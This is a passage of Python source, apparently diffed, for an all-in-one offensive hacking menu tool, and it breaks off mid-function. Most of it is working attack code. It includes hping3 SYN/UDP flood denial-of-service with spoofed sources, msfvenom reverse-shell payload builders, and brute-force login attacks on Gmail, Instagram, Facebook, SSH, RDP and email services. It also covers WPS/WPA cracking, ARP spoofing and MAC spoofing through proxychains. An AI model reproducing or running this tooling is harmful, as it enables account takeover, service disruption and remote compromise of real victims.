"\033[31m-----\033[33m-----\033[93m-----\033[32m-----\033[1;36m-----\033[94m-----\033[95m-----\033[31m-----\033[33m-----\033[93m-----\033[32m-----\033[1;36m-----\033[94m-----\033[95m-----\033[0m\n" + os.system("curl {0}".format(target)) + print "\n" + ip = socket.gethostbyname(target) + print G+"------------------------\033[0m" + print N+"\033[1mHost:\033[32m ", target + print N+"\033[1mIP:\033[32m ", ip + print G+"------------------------\033[0m" + os.system("curl -I {0}".format(target)) + print "\n" + request = requests.get(targetht + target) + http = request.status_code + if http == 200: + print("\nServer: [\033[32monline\033[0m]") + else: + print("\nServer: [\033[31moffline\033[0m]") + exit() + print "\n" + whois = requests.get("https://api.hackertarget.com/whois/?q=" + target).content.decode("UTF-8") + print(whois) + print "\n" + os.system("curl https://api.hackertarget.com/dnslookup/?q={0}".format(target)) + print "\n" + os.system("wafw00f {0}".format(target)) + print "\n" + os.system("sslscan {0}".format(target)) + print "\n" + os.system("curl https://api.hackertarget.com/geoip/?q={0}".format(target)) + print "\n" + os.system("curl https://api.hackertarget.com/reverseiplookup/?q={0}".format(target)) + print "\n" + os.system("curl https://api.hackertarget.com/hostsearch/?q={0}".format(target)) + print "\n" + os.system("curl https://api.hackertarget.com/reversedns/?q={0}".format(target)) + print "\n" + os.system("curl https://api.hackertarget.com/findshareddns/?q={0}".format(target)) + print "\n" + def daf(): + subdomainlist = ["ftp", "cpanel", "webmail", "localhost", "local", "mysql", "forum", "driect-connect", "blog", + "vb", "forums", "home", "direct", "forums", "mail", "access", "admin", "administrator", + "email", "downloads", "ssh", "owa", "bbs", "webmin", "paralel", "parallels", "www0", "www", + "www1", "www2", "www3", "www4", "www5", "shop", "api", "blogs", "test", "mx1", "cdn", "mysql", + "mail1", "secure", "server", "ns1", "ns2", "smtp", "vpn", "m", "mail2", "postal", "support", + "web", "dev"] + + for sublist in subdomainlist: + try: + hosts = str(sublist) + "." + str(target) + showip = socket.gethostbyname(str(hosts)) + print "\033[0m\033[32mHIT\033[0m:\033[1m " + str(showip) + ' | ' + str(hosts) + except: + print "\033[0mBypassing..." + + daf() + print "\033[0m" + print "\n" + os.system("nmap -A {0}".format(target)) + print "\n" + os.system("nmap --script dns-brute {0}".format(target)) + print "\n" + a = 'dirb {0}{1}/'.format(targetht,target) + os.system(a) + print "\n" + os.system("nikto -h {0} -p {1}".format(target,port)) + print "\n\033[31m-----\033[33m-----\033[93m-----\033[32m-----\033[1;36m-----\033[94m-----\033[95m-----\033[31m-----\033[33m-----\033[93m-----\033[32m-----\033[1;36m-----\033[94m-----\033[95m-----\033[0m" + except: + print "\033[91mError Something Went Wrong Maybe The Specified Target Is Not Available\033[0m" + +def specscan(): + print """\033[1m +Scans Available:\033[0m + +1: simple nmap portscan + +2: show document info of target with curl + +3: nmap OS detection, version detection, script scanning, and traceroute scan + +4: nmap dns bruteforce + +5: get a hosts ip address + +6: check if a host is online + +7: who-is lookup + +8: dns-lookup + +9: get a hosts source code + +10: web application firewall scanner + +11: run a ssl scan + +12: find the location of a ip address + +13: reverse ip lookup + +14: host search + +15: reverse dns + +16: find shared dns + +17: cloudflare bypass + +18: sslscan + +19: directory scan / bruteforce + +20: nikto scan [this might take awhile to finish] + +go back: go back to main menu + + """ + print "Type a number then your target Ex: 5 www.pornhub.com\n" + j = False + while not j: + try: + option, target = raw_input("\033[1mScan:\033[0m ").split() + if option == "1": + os.system("nmap {0}".format(target)) + if option == "2": + os.system("curl -I {0}".format(target)) + if option == "3": + os.system("nmap -A {0}".format(target)) + if option == "4": + os.system("nmap --script dns-brute {0}".format(target)) + if option == "5": + ip = socket.gethostbyname(target) + print """ + Host: {0} + IP: {1} + """.format(target, ip) + if option == "6": + ht = raw_input("\033[1mHTTP or HTTPS:\033[0m ") + if ht == "https": + targetht = "https://" + if ht == "http": + targetht = "http://" + request = requests.get(targetht + target) + http = request.status_code + if http == 200: + print("\nServer: [\033[32monline\033[0m]") + else: + print("\nServer: [\033[31moffline\033[0m]") + if option == "7": + whois = requests.get("https://api.hackertarget.com/whois/?q=" + target).content.decode("UTF-8") + print(whois) + if option == "8": + os.system("curl https://api.hackertarget.com/dnslookup/?q={0}".format(target)) + if option == "9": + os.system("curl {0}".format(target)) + if option == "10": + os.system("wafw00f {0}".format(target)) + if option == "11": + os.system("sslscan {0}".format(target)) + if option == "12": + os.system("curl https://api.hackertarget.com/geoip/?q={0}".format(target)) + if option == "13": + os.system("curl https://api.hackertarget.com/reverseiplookup/?q={0}".format(target)) + if option == "14": + os.system("curl https://api.hackertarget.com/hostsearch/?q={0}".format(target)) + if option == "15": + os.system("curl https://api.hackertarget.com/reversedns/?q={0}".format(target)) + if option == "16": + os.system("curl https://api.hackertarget.com/findshareddns/?q={0}".format(target)) + if option == "17": + def daf(): + subdomainlist = ["ftp", "cpanel", "webmail", "localhost", "local", "mysql", "forum", "driect-connect", "blog", + "vb", "forums", "home", "direct", "forums", "mail", "access", "admin", "administrator", + "email", "downloads", "ssh", "owa", "bbs", "webmin", "paralel", "parallels", "www0", "www", + "www1", "www2", "www3", "www4", "www5", "shop", "api", "blogs", "test", "mx1", "cdn", "mysql", + "mail1", "secure", "server", "ns1", "ns2", "smtp", "vpn", "m", "mail2", "postal", "support", + "web", "dev"] + + for sublist in subdomainlist: + try: + hosts = str(sublist) + "." + str(target) + showip = socket.gethostbyname(str(hosts)) + print "\033[0m\033[32mHIT\033[0m:\033[1m " + str(showip) + ' | ' + str(hosts) + except: + print "\033[0mBypassing..." + + daf() + if option == "18": + a = 'sslscan {0}'.format(target) + os.system(a) + if option == "19": + ht = raw_input("HTTP or HTTPS: ") + if ht == "https": + targetht = "https://" + if ht == "http": + targetht = "http://" + a = 'dirb {0}{1}/'.format(targetht,target) + os.system(a) + if option == "20": + port = raw_input("\033[1mPort:\033[0m ") + os.system("nikto -h {0} -p {1}".format(target,port)) + if target == "back": + break + except: + print "\n" + break + j = True + + +def dos(): + print """ +{0}tcp: * tcp target port +{1}udp: * udp target port +{2}syn: * syn target port +{3}ack: * ack target port +{4}xmas: * xmas target port +\033[0m +!Press CTRL C to stop attacking! + """.format(random.choice(colorlist), random.choice(colorlist), random.choice(colorlist), random.choice(colorlist), random.choice(colorlist)) + try: + command, target, port = raw_input("\033[1mMethod:\033[0m ").split() + if command == "tcp": + os.system("service tor restart") + os.system("hping3 --flood -d 50000 --rand-source -p {0} {1}".format(port,target)) + if command == "udp": + try: + ip = socket.gethostbyname(target) + port = int(port) + os.system("service tor restart") + sent = 0 + while True: + print N+"UDP attack sending | {6}{5}\033[0m | {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year,ip,random.choice(colorlist)) + sock.sendto(Gb, (ip,port)) + sock.sendto(bytes, (ip,port)) + sock.sendto(Kb, (ip,port)) + sent = sent + 1 + port = port + 1 + if port == 65534: + port = 1 + except: + print "\nUDP flood stopped\n" + os.system("") + if command == "syn": + os.system("service tor restart") + os.system("hping3 -S --flood -d 50000 --rand-source -p {0} {1}".format(port,target)) + if command == "ack": + os.system("service tor restart") + os.system("hping3 -A --flood -d 50000 --rand-source -p {0} {1}".format(port,target)) + if command == "xmas": + os.system("hping3 -X --flood -d 50000 --rand-source -p {0} {1}".format(port,target)) + except: + print "\n\033[91mError: Not Enough Arguments\033[0m\n " + + +def payload(): + print """\033[0m033[1m +Payloads Available:\033[0m + +{0}1: windows/meterpreter/reverse_tcp + +{1}2: android/meterpreter/reverse_tcp + +{2}3: php/meterpreter/reverse_tcp + +{3}4: python/meterpreter/reverse_tcp + +{4}5: ruby/shell_reverse_tcp + +{5}6: osx/x86/vforkshell/reverse_tcp + +{6}7: linux/aarch64/meterpreter/reverse_tcp + + \033[0m""".format(random.choice(colorlist), random.choice(colorlist), random.choice(colorlist), random.choice(colorlist), random.choice(colorlist), random.choice(colorlist), random.choice(colorlist)) + choice = raw_input("\033[1mPayload:\033[0m ") + lhost = raw_input("\033[1mLHOST: \033[0m") + lport = raw_input("\033[1mLPORT: \033[0m") + name = raw_input("\033[1mFilename: \033[0m") + if choice == "1": + payload = 'msfvenom -p windows/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.exe'.format(lhost, lport, name) + os.system(payload) + if choice == "2": + payload = 'msfvenom -p android/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.apk'.format(lhost, lport, name) + os.system(payload) + if choice == "3": + payload = 'msfvenom -p php/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.php'.format(lhost, lport, name) + os.system(payload) + if choice == "4": + payload = 'msfvenom -p python/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.py'.format(lhost, lport, name) + os.system(payload) + if choice == "5": + payload = 'msfvenom -p ruby/shell_reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.rb'.format(lhost, lport, name) + os.system(payload) + if choice == "6": + payload = 'msfvenom -p osx/x86/vforkshell/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.app'.format(lhost, lport, name) + os.system(payload) + if choice == "7": + payload = 'msfvenom -p linux/aarch64/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.tar'.format(lhost, lport, name) + os.system(payload) + +def gmail(): + + def main(): + print '\033[93m=================================================' + print '\033[91m create by Ha3MrX ' + print '\033[93m=================================================' + print '\033[95m ++++++++++++++++++++ ' + print '\n ' + print '\033[92m _,. ' + print ' ' + print ' ' + print ' HA3MrX ' + print ' _,. ' + print ' ,` -.) ' + print ' ( _/-\\-._ ' + print ' /,|`--._,-^| , ' + print ' \_| |`-._/|| , | ' + print ' | `-, / | / / ' + print ' | || | / / ' + print ' `r-._||/ __ / / ' + print ' __,-<_ )`-/ `./ / ' + print ' \ `--- \ / / / ' + print ' | |./ / ' + print ' / // / ' + print ' \_/ \ |/ / ' + print ' | | _,^- / / ' + print ' | , `` (\/ /_ ' + print ' \,.->._ \X-=/^ ' + print ' ( / `-._//^` ' + print ' `Y-.____(__} ' + print ' | {__) ' + print ' () \033[91m V.1.0 ' + + main() + print '\033[0m[1] start the attack' + print '[2] exit' + option = input('==>') + if option == 1: + file_path = raw_input('path of passwords file :') + else: + system('clear') + exit() + pass_file = open(file_path,'r') + pass_list = pass_file.readlines() + def login(): + i = 0 + user_name = raw_input('target email :') + server = smtplib.SMTP_SSL('smtp.gmail.com', 465) + server.ehlo() + for password in pass_list: + i = i + 1 + print str(i) + '/' + str(len(pass_list)) + try: + server.login(user_name, password) + system('clear') + main() + print '\n' + print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' + break + except smtplib.SMTPAuthenticationError as e: + error = str(e) + if error[14] == '<': + system('clear') + main() + print '[+] this account has been hacked, password :' + password + ' ^_^' + + break + else: + print '[!] password not found => ' + password + login() + +def insta(): + insta = raw_input("\033[1mUsername:\033[0m ") + jl = raw_input("\033[1mWordlist:\033[0m ") + print "\033[1m\033[94m\nMODES>: [0] fastest, [1] fast, [2] slow, [3] slowest\033[0m\n" + k = raw_input("\033[1mMode:\033[0m ") + ma = 'python3 files/Instagram/instagram.py {0} {1} -m {2}'.format(insta,jl,k) + os.system(ma) + +def fb(): + facebook = raw_input("\033[1m[EMAIL/ID->]:\033[0m ") + word = raw_input("\033[1m[WORDLIST->]:\033[0m ") + ks = 'cd files && perl fb-brute.pl {0} {1}'.format(facebook,word) + os.system(ks) +def blackhydra(): + def restart_program(): + python = sys.executable + os.execl(python, python, * sys.argv) + curdir = os.getcwd() + ############################## + + os.system("clear") + print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" + print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" + print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" + print G+"-----------------------------------------------------" + print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" + print R+" [*] Author: DedSecTL --- [*] Version 1.0" + print N+"c=={:::::::::::::::> Black Hydra Console" + print R+" [*] My FB : https://m.facebook.com/100004136748473" + print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" + print + print " ===|[ Brute Force ]|===" + print + print " [01] Cisco Brute Force " + print " [02] VNC Brute Force " + print " [03] FTP Brute Force " + print " [04] Gmail Brute Force " + print " [05] SSH Brute Force " + print " [06] TeamSpeak Brute Force " + print " [07] Telnet Brute Force " + print " [08] Yahoo Mail Brute Force " + print " [09] Hotmail Brute Force " + print " [10] Router Speedy Brute Force " + print " [11] RDP Brute Force " + print " [12] MySQL Brute Force " + print + print " [00] Exit" + print + bhydra = raw_input("[*] B-Hydra > ") + + if bhydra == '01' or bhydra == '1': + print + print " +---------------------------+" + print " | Cisco Brute Force |" + print " +---------------------------+" + print + print + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -P %s %s cisco" % (word, iphost)) + sys.exit() + + elif bhydra == '02' or bhydra == '2': + print + print " +---------------------------+" + print " | VNC Brute Force |" + print " +---------------------------+" + print + print + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) + iphost = raw_input("[*] IP/Hostname : ") + + elif bhydra == '03' or bhydra == '3': + print + print " +------------------------------+" + print " | FTP Brute Force |" + print " +------------------------------+" + print + print + user = raw_input("[*] User : ") + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '04' or bhydra == '4': + print + print " +------------------------------+" + print " | Gmail Brute Force |" + print " +------------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '05' or bhydra == '5': + print + print " +--------------------------------+" + print " | SSH Brute Force |" + print " +--------------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) + sys.exit() + + elif bhydra == '06' or bhydra == '6': + print + print " +-------------------------+" + print " | TeamSpeak Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) + sys.exit() + + elif bhydra == '07' or bhydra == '7': + print + print " +-------------------------+" + print " | Telnet Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) + sys.exit() + + elif bhydra == '08' or bhydra == '8': + print + print " +---------------------------+" + print " | Yahoo Brute Force |" + print " +---------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '09' or bhydra == '9': + print + print " +----------------------------+" + print " | Hotmail Brute Force |" + print " +----------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '10': + print + print " +-----------------------------+" + print " | Router Speedy Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) + sys.exit() + + elif bhydra == '11': + print + print " +----------------------------+" + print " | RDP Brute Force |" + print " +----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '12': + print + print " +-----------------------------+" + print " | MySQL Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) + + elif bhydra == '00' or bhydra == '0': + print "\n[!] Exit the Program..." + sys.exit() + + else: + print "\n[!] ERROR : Wrong Input" + time.sleep(1) + restart_program() + +def medusa(): + k = raw_input("\033[1mHost:\033[0m ") + u = raw_input("\033[1mUser:\033[0m ") + p = raw_input("\033[1mWordlist:\033[0m ") + os.system("medusa -d") + print "\n" + m = raw_input("\033[1mModule:\033[0m ") + n = raw_input("\033[1mPort:\033[0m ") + a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) + os.system(a) + +def aircrack(): + b = raw_input(G+"\033[1mBSSID: \033[0m") + e = raw_input(G+"\033[1mESSID: \033[0m") + w = raw_input(G+"\033[1mWordlist: \033[0m") + h = raw_input(G+"\033[1mHandshake file: \033[0m") + os.system("iwconfig") + i = raw_input(G+"\033[1mInterface: \033[0m") + os.system("airmon-ng start " + i) + a = 'aircrack-ng -b {0} -e {1} -w {2} {3} {4}' + os.system(a) + os.system("airmon-ng stop " + i) + +def reaver(): + os.system("iwconfig") + j = raw_input("\033[1mSelect Interface:\033[0m ") + k = raw_input("\033[1mEnter BSSID:\033[0m ") + a = 'reaver -i {0} -b {1} -vv'.format(j,k) + os.system(a) + +def password(): + print """ +{0}1: gmail +{1}2: instagram +{2}3: facebook +{3}4: hydra +{4}5: medusa +{5}6: aircrack-ng +{6}7: reaver +\033[0m +go back: go to main menu + """.format(random.choice(colorlist), random.choice(colorlist), random.choice(colorlist), random.choice(colorlist), random.choice(colorlist), random.choice(colorlist), random.choice(colorlist)) + try: + choice = raw_input("\033[1mAttack:\033[0m ") + if choice == "1": + gmail() + if choice == "2": + insta() + if choice == "3": + fb() + if choice == "4": + blackhydra() + if choice == "5": + medusa() + if choice == "6": + aircrack() + if choice == "7": + reaver() + if choice == "go back": + os.system("") + + except: + print "\n" + +def reboot(): + python = sys.executable + os.execl(python, python, * sys.argv) + curdir = os.getcwd() + +def monitoron(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng start " + i) +def monitoroff(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng stop " + i) + +def command(): + command = raw_input("\033[1mCommand:\033[0m ") + os.system(command) + +def anonon(): + print "\033[93m------------------------\033[0m" + print "\nSTARTING MACCHANGER\n" + print "\033[93m------------------------\033[0m" + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -r " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) + show = 'macchanger -s {0}'.format(k) + os.system(show) + os.system('proxychains python /root/hackers-tool-kit/htk-lite/htkl.py --quickrun') + + +def anonoff(): + print "\033[93m------------------------\033[0m" + print "\nSTOPPING MACCHANGER\n" + print "\033[93m------------------------\033[0m" + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -p " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) + sys.exit() + reboot() + +def sysinfo(): + os.system("iwconfig") + k = raw_input("\033[1mInterface:\033[0m ") + os.system("clear") + os.system("ifconfig") + print "\n" + os.system("iwconfig") + print "\n" + os.system("neofetch") + print "\n" + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) + print "\n Router IP" + print "----------------------------\033[92m" + os.system('curl "http://myexternalip.com/raw"') + print "\n\033[0m----------------------------" + print "\n" + show = 'macchanger -s {0}'.format(k) + os.system(show) + os.system("uname -a") + os.system("whoami") + +def netscan(): + print """ +{0}1: scan for devices in your network + +{1}2: scan for networks around you +\033[0m +go back: go back to main menu + """.format(random.choice(colorlist), random.choice(colorlist)) + try: + choice = raw_input("\033[1mScan:\033[0m ") + + if choice == "1": + os.system("netdiscover") + if choice == "2": + os.system("iwconfig") + m = raw_input("\033[1mSelect Interface:\033[0m ") + os.system("airmon-ng start " + m) + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("\033[1m[y/n]>\033[0m ") + if j == "y": + os.system("airodump-ng -w /root/SCAN " + m) + print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" + if j == "n": + os.system("airodump-ng " + m) + os.system("airmon-ng stop " + i) + if choice == "go back": + os.system("") + except: + print "\n" + +def verscan(): + print """ +Services available: + +{0}ssh + +{1}mysql +\033[0m + """.format(random.choice(colorlist), random.choice(colorlist)) + try: + service = raw_input("\033[1mService: \033[0m") + if service == "ssh": + f = raw_input(G+"\033[1mTarget: \033[0m") + g = raw_input(G+"\033[1mPort: \033[0m") + t = raw_input(G+"\033[1mThreads: \033[0m") + b = raw_input(G+"\033[1mTimeout: \033[0m") + os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') + os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) + os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) + os.system('echo "show options\n" >> sshver.rc') + os.system('echo "run\n" >> sshver.rc') + os.system('echo "exit\n" >> sshver.rc') + os.system("service postgresql restart") + os.system('msfconsole -q -r sshver.rc') + os.system('rm -rf sshver.rc') + + if service == "mysql": + f = raw_input(G+"\033[1mTarget: \033[0m") + g = raw_input(G+"\033[1mPort: \033[0m") + t = raw_input(G+"\033[1mThreads: \033[0m") + os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') + os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) + os.system('echo "show options\n" >> mysqlv.rc') + os.system('echo "run\n" >> mysqlv.rc') + os.system('echo "exit\n" >> mysqlv.rc') + os.system("service postgresql restart") + os.system('msfconsole -q -r mysqlv.rc') + os.system('rm -rf mysqlv.rc') + except: + print "\n" + +def wordlist(): + os.system("cd wordlists && cupp -i") + print Y+"wordlist saved to /root/htk-lite/wordlists \033[0m" + +def arpspoof(): + print "\033[93mif using multiple targets heres an example: 134.143.1.3, 134.143.1.6\033[0m\n" + h = raw_input("\033[1mTarget/s:\033[0m ") + os.system('echo "net.sniff on\n" >> arp.cap') + os.system('echo "set arp.spoof.targets {0}\n" >> arp.cap'.format(h)) + os.system('echo "arp.spoof on\n" >> arp.cap') + print '\n\033[93mto stop type "exit"\033[0m' + os.system("sleep 2") + os.system("bettercap -no-history -caplet arp.cap") + os.system("rm arp.cap") + +def traff(): + os.system("iwconfig") + s = raw_input("\033[1mSelect Interface:\033[0m ") + os.system("tcpdump -i " + s) + +def hashid(): + try: + #!/usr/bin/python + # encoding: utf-8 + # Hash Identifier v1.1 + # By Zion3R + # www.Blackploit.com + # Root@Blackploit.com + + logo=''' ######################################################################### + # __ __ __ ______ _____ # + # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # + # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # + # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # + # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # + # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # + # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # + # By Zion3R # + # www.Blackploit.com # + # Root@Blackploit.com # + #########################################################################''' + + algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} + + # hash.islower() minusculas + # hash.isdigit() numerico + # hash.isalpha() letras + # hash.isalnum() alfanumerico + + def CRC16(): + hs='4607' + if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101020") + def CRC16CCITT(): + hs='3d08' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101040") + def FCS16(): + hs='0e5b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101060") + + def CRC32(): + hs='b33fd057' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102040") + def ADLER32(): + hs='0607cb42' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102020") + def CRC32B(): + hs='b764a0d9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102060") + def XOR32(): + hs='0000003f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102080") + + def GHash323(): + hs='80000000' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103040") + def GHash325(): + hs='85318985' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103020") + + def DESUnix(): + hs='ZiY8YtDKXJwYQ' + if len(hash)==len(hs) and 